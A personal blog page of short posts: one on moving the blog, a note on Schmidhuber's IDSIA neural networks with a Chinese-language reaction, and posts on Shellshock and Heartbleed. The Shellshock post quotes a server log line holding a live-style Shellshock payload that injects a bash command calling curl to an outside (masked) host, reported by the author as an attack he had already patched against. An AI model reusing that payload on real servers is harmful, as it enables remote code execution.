Blog move done

Finally completely moved all my blog posts from the original blogspot site to my own server.

All posts are here now and the original site:

is deprecated now.

Still a lot of topics were started but haven’t been completed. I will try to put some existing draft online recently.



Between 2009 and 2012, the recurrent neural networks and deep feedforward neural networks developed in the research group of Jürgen Schmidhuber at the Swiss AI Lab IDSIA have won eight international competitions in pattern recognition and machine learning.[12][13] For example, the bi-directional and multi-dimensional long short term memory (LSTM)[14][15][16][17] of Alex Graves et al. won three competitions in connected handwriting recognition at the 2009 International Conference on Document Analysis and Recognition (ICDAR), without any prior knowledge about the three different languages to be learned.

赶快搜索了Jürgen Schmidhuber,然后看了一些视频,居然又联系到了Kolmogorov complexity,深度学习,可计算宇宙,智能,创造力,以及Gödel。。。。现在脑子还是一团浆糊,不过隐隐感觉到Jürgen可能会改变历史。。。。至少他的演讲很有趣:

Targeted after 3 days - - [27/Sep/2014:04:54:05 +0800] "HEAD /cgi-bin/ HTTP/1.1" 403 158 "-" "() { :;}; /bin/bash -c 'curl<site-name-masked-off>/cgi-bin/'"

This is the first sign on my server that someone try to exploit the potential Shellshock vulnerability on my server, just 3 days after the vulnerability was disclosed. Should I feel happy that I actually get high attention? Luckily I patched this server the next day the vulnerability was disclosed.

Vulnerability found in Bash

2014 must be a really bad year for open source community in security.

Less than 6 months after Heartbleed was found in OpenSSL, now Bash is found vulnerable of remote code execution. This time I’m not sure it’s because of poor funding or something else.

Maybe it’s a good time now to look back on how did the Heartbleed bug come about. Mr. Bruce Schenier posted a very good article on this.

Heartbleed vulnerability

Just saw some friends sharing this in Wechat. Seems I will have a lot of work to do – patching my servers, replacing certificates, regenerating keys, etc.:(

It’s really unbelievable. This will be a big blow on the open source community. I already saw people saying “see? Open source is no securer”. Well, they are right.

To me, this has nothing to do with open source or not. M$ may have something even worse but you will need longer time to find out. I just searched the web and found that as a library that has been so widely used, OpenSSL has only one full time developer and receives on average $2,000 donation per year. What do you expect?

But that simply won’t justify such a disaster and it will cast a bad image for open source community in general. I can only hope leaders in this industry see this differently and start to support these great open source projects. They deserve better!